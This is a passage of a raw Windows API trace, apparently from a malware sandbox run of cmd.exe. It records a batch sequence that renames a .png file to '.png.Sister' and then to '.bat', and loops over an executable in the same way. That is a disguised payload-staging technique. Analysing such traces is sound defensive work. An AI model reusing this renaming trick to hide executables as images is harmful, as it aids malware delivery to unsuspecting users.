Ptr=0x21ed9517ea0, Size=0x1a0) returned 0x21ed9517ea0 [0176.647] GetProcessHeap () returned 0x21ed8c70000 [0176.647] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9517ea0) returned 0x1a0 [0176.647] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe2b8 | out: _Buffer="\r\n") returned 2 [0176.647] _get_osfhandle (_FileHandle=1) returned 0x50 [0176.647] GetFileType (hFile=0x50) returned 0x2 [0176.647] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0176.647] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe248 | out: lpMode=0xa6cf4fe248) returned 1 [0176.664] _get_osfhandle (_FileHandle=1) returned 0x50 [0176.664] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe288, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe288*=0x2) returned 1 [0176.725] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0176.725] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe2c8 | out: _Buffer="C:\\Users\\FD1HVy\\Desktop") returned 23 [0176.725] _vsnwprintf (in: _Buffer=0x21ed8e8018e, _BufferCount=0x83ce, _Format="%c", _ArgList=0xa6cf4fe2c8 | out: _Buffer=">") returned 1 [0176.725] _get_osfhandle (_FileHandle=1) returned 0x50 [0176.725] GetFileType (hFile=0x50) returned 0x2 [0176.725] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0176.725] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe278 | out: lpMode=0xa6cf4fe278) returned 1 [0176.741] _get_osfhandle (_FileHandle=1) returned 0x50 [0176.741] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x18, lpNumberOfCharsWritten=0xa6cf4fe2b8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe2b8*=0x18) returned 1 [0176.757] _get_osfhandle (_FileHandle=1) returned 0x50 [0176.757] GetFileType (hFile=0x50) returned 0x2 [0176.758] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0176.758] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0176.777] _get_osfhandle (_FileHandle=1) returned 0x50 [0176.777] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed95179e0*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed95179e0*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0176.796] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"rJUrds91A0r_fz.png\" \"rJUrds91A0r_fz.png.Sister\" ") returned 50 [0176.796] _get_osfhandle (_FileHandle=1) returned 0x50 [0176.796] GetFileType (hFile=0x50) returned 0x2 [0176.796] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0176.796] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0176.805] _get_osfhandle (_FileHandle=1) returned 0x50 [0176.805] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x32, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x32) returned 1 [0176.822] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe558 | out: _Buffer=" & ") returned 3 [0176.822] _get_osfhandle (_FileHandle=1) returned 0x50 [0176.822] GetFileType (hFile=0x50) returned 0x2 [0176.823] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0176.823] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0176.839] _get_osfhandle (_FileHandle=1) returned 0x50 [0176.839] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0176.850] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%.3s", _ArgList=0xa6cf4fe528 | out: _Buffer="for") returned 3 [0176.850] _get_osfhandle (_FileHandle=1) returned 0x50 [0176.851] GetFileType (hFile=0x50) returned 0x2 [0176.851] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0176.851] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0176.879] _get_osfhandle (_FileHandle=1) returned 0x50 [0176.879] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x3) returned 1 [0176.884] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" %a in ") returned 7 [0176.884] _get_osfhandle (_FileHandle=1) returned 0x50 [0176.884] GetFileType (hFile=0x50) returned 0x2 [0176.884] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0176.885] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0176.906] _get_osfhandle (_FileHandle=1) returned 0x50 [0176.906] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x7) returned 1 [0176.920] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="(%s) %s ", _ArgList=0xa6cf4fe528 | out: _Buffer="(\"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe\") do ") returned 85 [0176.920] _get_osfhandle (_FileHandle=1) returned 0x50 [0176.920] GetFileType (hFile=0x50) returned 0x2 [0176.920] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0176.920] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0176.937] _get_osfhandle (_FileHandle=1) returned 0x50 [0176.937] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x55, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x55) returned 1 [0176.952] _get_osfhandle (_FileHandle=1) returned 0x50 [0176.952] GetFileType (hFile=0x50) returned 0x2 [0176.952] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0176.952] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0176.969] _get_osfhandle (_FileHandle=1) returned 0x50 [0176.969] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed9517e70*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed9517e70*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0176.981] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"rJUrds91A0r_fz.png.Sister\" \"rJUrds91A0r_fz.bat\" ") returned 50 [0176.981] _get_osfhandle (_FileHandle=1) returned 0x50 [0176.981] GetFileType (hFile=0x50) returned 0x2 [0176.981] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0176.981] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0177.006] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.006] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x32, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x32) returned 1 [0177.030] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe5b8 | out: _Buffer="\r\n") returned 2 [0177.030] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.030] GetFileType (hFile=0x50) returned 0x2 [0177.030] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0177.031] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0177.044] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.044] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x2) returned 1 [0177.056] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fe240, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0177.158] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0177.158] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0177.158] malloc (_Size=0xffce) returned 0x21ed963ff00 [0177.158] ??_V@YAXPEAX@Z () returned 0x21ed963ff00 [0177.158] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0177.158] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0177.159] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0177.159] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0177.159] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0177.159] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0177.159] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0177.159] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0177.159] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0177.159] ??_V@YAXPEAX@Z () returned 0x1 [0177.159] GetProcessHeap () returned 0x21ed8c70000 [0177.159] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xd8) returned 0x21ed937e630 [0177.159] GetProcessHeap () returned 0x21ed8c70000 [0177.159] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed937e630, Size=0x74) returned 0x21ed937e630 [0177.159] GetProcessHeap () returned 0x21ed8c70000 [0177.160] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed937e630) returned 0x74 [0177.160] GetProcessHeap () returned 0x21ed8c70000 [0177.160] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x7c) returned 0x21ed9379c90 [0177.160] GetProcessHeap () returned 0x21ed8c70000 [0177.160] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xd8) returned 0x21ed9379ef0 [0177.160] GetProcessHeap () returned 0x21ed8c70000 [0177.160] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9379ef0, Size=0x74) returned 0x21ed9379ef0 [0177.160] GetProcessHeap () returned 0x21ed8c70000 [0177.160] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9379ef0) returned 0x74 [0177.160] malloc (_Size=0xffce) returned 0x21ed963ff00 [0177.160] ??_V@YAXPEAX@Z () returned 0x21ed963ff00 [0177.161] GetProcessHeap () returned 0x21ed8c70000 [0177.161] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8d65220 [0177.161] GetProcessHeap () returned 0x21ed8c70000 [0177.161] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed9484ac0 [0177.161] _wcsicmp (_String1="rJUrds91A0r_fz.png", _String2=".") returned 68 [0177.161] _wcsicmp (_String1="rJUrds91A0r_fz.png", _String2="..") returned 68 [0177.161] GetFileAttributesW (lpFileName="rJUrds91A0r_fz.png" (normalized: "c:\\users\\fd1hvy\\desktop\\rjurds91a0r_fz.png")) returned 0x20 [0177.161] GetProcessHeap () returned 0x21ed8c70000 [0177.162] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed9518050 [0177.164] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed9518060 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0177.164] SetErrorMode (uMode=0x0) returned 0x0 [0177.164] SetErrorMode (uMode=0x1) returned 0x0 [0177.164] GetFullPathNameW (in: lpFileName="rJUrds91A0r_fz.png", nBufferLength=0x7fe7, lpBuffer=0x21ed963ff00, lpFilePart=0xa6cf4fd660 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\rJUrds91A0r_fz.png", lpFilePart=0xa6cf4fd660*="rJUrds91A0r_fz.png") returned 0x2a [0177.165] SetErrorMode (uMode=0x0) returned 0x1 [0177.165] GetProcessHeap () returned 0x21ed8c70000 [0177.165] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed9482d80 [0177.165] _wcsicmp (_String1="rJUrds91A0r_fz.png", _String2=".") returned 68 [0177.165] _wcsicmp (_String1="rJUrds91A0r_fz.png", _String2="..") returned 68 [0177.165] GetFileAttributesW (lpFileName="rJUrds91A0r_fz.png" (normalized: "c:\\users\\fd1hvy\\desktop\\rjurds91a0r_fz.png")) returned 0x20 [0177.165] ??_V@YAXPEAX@Z () returned 0x1 [0177.165] malloc (_Size=0xffce) returned 0x21ed963ff00 [0177.165] ??_V@YAXPEAX@Z () returned 0x21ed963ff00 [0177.165] malloc (_Size=0xffce) returned 0x21ed964fee0 [0177.165] ??_V@YAXPEAX@Z () returned 0x21ed964fee0 [0177.167] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\rJUrds91A0r_fz.png" (normalized: "c:\\users\\fd1hvy\\desktop\\rjurds91a0r_fz.png")) returned 0x20 [0177.167] malloc (_Size=0xffce) returned 0x21ed923fd00 [0177.167] ??_V@YAXPEAX@Z () returned 0x21ed923fd00 [0177.167] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\rJUrds91A0r_fz.png", fInfoLevelId=0x1, lpFindFileData=0x21ed9484ad0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x21ed9484ad0) returned 0x21ed8d64f80 [0177.167] malloc (_Size=0xffce) returned 0x21ed924fce0 [0177.167] ??_V@YAXPEAX@Z () returned 0x21ed924fce0 [0177.167] ??_V@YAXPEAX@Z () returned 0x1 [0177.168] MoveFileWithProgressW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\rJUrds91A0r_fz.png" (normalized: "c:\\users\\fd1hvy\\desktop\\rjurds91a0r_fz.png"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\rJUrds91A0r_fz.png.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\rjurds91a0r_fz.png.sister"), lpProgressRoutine=0x0, lpData=0x0, dwFlags=0x2) returned 1 [0177.178] FindNextFileW (in: hFindFile=0x21ed8d64f80, lpFindFileData=0x21ed9484ad0 | out: lpFindFileData=0x21ed9484ad0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xed2eb2f0, ftCreationTime.dwHighDateTime=0x1d5ea33, ftLastAccessTime.dwLowDateTime=0x490cc6e0, ftLastAccessTime.dwHighDateTime=0x1d5ed48, ftLastWriteTime.dwLowDateTime=0x490cc6e0, ftLastWriteTime.dwHighDateTime=0x1d5ed48, nFileSizeHigh=0x0, nFileSizeLow=0xe80d, dwReserved0=0x0, dwReserved1=0x0, cFileName="rJUrds91A0r_fz.png", cAlternateFileName="")) returned 0 [0177.180] GetLastError () returned 0x12 [0177.180] FindClose (in: hFindFile=0x21ed8d64f80 | out: hFindFile=0x21ed8d64f80) returned 1 [0177.180] ??_V@YAXPEAX@Z () returned 0x1 [0177.180] ??_V@YAXPEAX@Z () returned 0x1 [0177.180] ??_V@YAXPEAX@Z () returned 0x1 [0177.182] ??_V@YAXPEAX@Z () returned 0x1 [0177.182] GetProcessHeap () returned 0x21ed8c70000 [0177.182] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8d658e0 [0177.182] GetProcessHeap () returned 0x21ed8c70000 [0177.182] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c95a80, Size=0x16) returned 0x21ed8c95ba0 [0177.182] GetProcessHeap () returned 0x21ed8c70000 [0177.182] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c95ba0) returned 0x16 [0177.183] GetProcessHeap () returned 0x21ed8c70000 [0177.183] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c7d330, Size=0x20) returned 0x21ed8c7d330 [0177.183] GetProcessHeap () returned 0x21ed8c70000 [0177.183] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c7d330) returned 0x20 [0177.183] GetProcessHeap () returned 0x21ed8c70000 [0177.183] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x150) returned 0x21ed9379f80 [0177.183] GetProcessHeap () returned 0x21ed8c70000 [0177.183] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9379f80, Size=0xb2) returned 0x21ed9379f80 [0177.183] GetProcessHeap () returned 0x21ed8c70000 [0177.183] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9379f80) returned 0xb2 [0177.183] GetProcessHeap () returned 0x21ed8c70000 [0177.183] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9528040 [0177.183] GetProcessHeap () returned 0x21ed8c70000 [0177.183] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9528040, Size=0x30) returned 0x21ed9528040 [0177.183] GetProcessHeap () returned 0x21ed8c70000 [0177.183] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9528040) returned 0x30 [0177.183] GetProcessHeap () returned 0x21ed8c70000 [0177.183] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9528080 [0177.183] malloc (_Size=0x1ff9c) returned 0x21ed963ff00 [0177.187] GetProcessHeap () returned 0x21ed8c70000 [0177.187] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed937d8d0 [0177.187] GetProcessHeap () returned 0x21ed8c70000 [0177.187] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xac) returned 0x21ed937c790 [0177.187] ??_V@YAXPEAX@Z () returned 0x1 [0177.187] malloc (_Size=0x1ff9c) returned 0x21ed963ff00 [0177.188] GetProcessHeap () returned 0x21ed8c70000 [0177.188] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed937e290 [0177.188] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", nBufferLength=0xffce, lpBuffer=0x21ed963ff00, lpFilePart=0xa6cf4fdd08 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFilePart=0xa6cf4fdd08*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe") returned 0x4d [0177.188] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd937e700, cFileName="Users", cAlternateFileName="")) returned 0x21ed8d651c0 [0177.188] FindClose (in: hFindFile=0x21ed8d651c0 | out: hFindFile=0x21ed8d651c0) returned 1 [0177.188] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd937e700, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8d650a0 [0177.188] FindClose (in: hFindFile=0x21ed8d650a0 | out: hFindFile=0x21ed8d650a0) returned 1 [0177.188] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x94358ebb, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0x94358ebb, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd937e700, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed8d65640 [0177.189] FindClose (in: hFindFile=0x21ed8d65640 | out: hFindFile=0x21ed8d65640) returned 1 [0177.189] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x94358ebb, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0x94358ebb, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd937e700, cFileName="Desktop", cAlternateFileName="")) returned 0xffffffffffffffff [0177.189] malloc (_Size=0x1ff9c) returned 0x21ed923fd00 [0177.190] ??_V@YAXPEAX@Z () returned 0x21ed923fd00 [0177.191] GetProcessHeap () returned 0x21ed8c70000 [0177.191] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x74) returned 0x21ed8d674b0 [0177.191] ??_V@YAXPEAX@Z () returned 0x1 [0177.191] ??_V@YAXPEAX@Z () returned 0x1 [0177.191] GetProcessHeap () returned 0x21ed8c70000 [0177.191] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9528080, Size=0x490) returned 0x21ed9528080 [0177.191] GetProcessHeap () returned 0x21ed8c70000 [0177.191] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9528080) returned 0x490 [0177.191] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fddc8 | out: _Buffer="\r\n") returned 2 [0177.191] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.191] GetFileType (hFile=0x50) returned 0x2 [0177.191] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0177.191] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd58 | out: lpMode=0xa6cf4fdd58) returned 1 [0177.206] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.206] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fdd98, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fdd98*=0x2) returned 1 [0177.232] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0177.232] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fddd8 | out: _Buffer="C:\\Users\\FD1HVy\\Desktop") returned 23 [0177.232] _vsnwprintf (in: _Buffer=0x21ed8e8018e, _BufferCount=0x83ce, _Format="%c", _ArgList=0xa6cf4fddd8 | out: _Buffer=">") returned 1 [0177.232] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.232] GetFileType (hFile=0x50) returned 0x2 [0177.232] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0177.232] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd88 | out: lpMode=0xa6cf4fdd88) returned 1 [0177.244] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.244] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x18, lpNumberOfCharsWritten=0xa6cf4fddc8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fddc8*=0x18) returned 1 [0177.254] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.254] GetFileType (hFile=0x50) returned 0x2 [0177.254] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0177.254] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0177.279] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.279] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed9528050*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x21ed9528050*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x3) returned 1 [0177.301] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe098 | out: _Buffer=" \"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister\" \"CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.bat\" ") returned 144 [0177.301] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.301] GetFileType (hFile=0x50) returned 0x2 [0177.301] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0177.301] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe028 | out: lpMode=0xa6cf4fe028) returned 1 [0177.335] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.335] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x90, lpNumberOfCharsWritten=0xa6cf4fe068, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe068*=0x90) returned 1 [0177.356] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe0c8 | out: _Buffer="\r\n") returned 2 [0177.356] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.356] GetFileType (hFile=0x50) returned 0x2 [0177.356] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0177.356] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 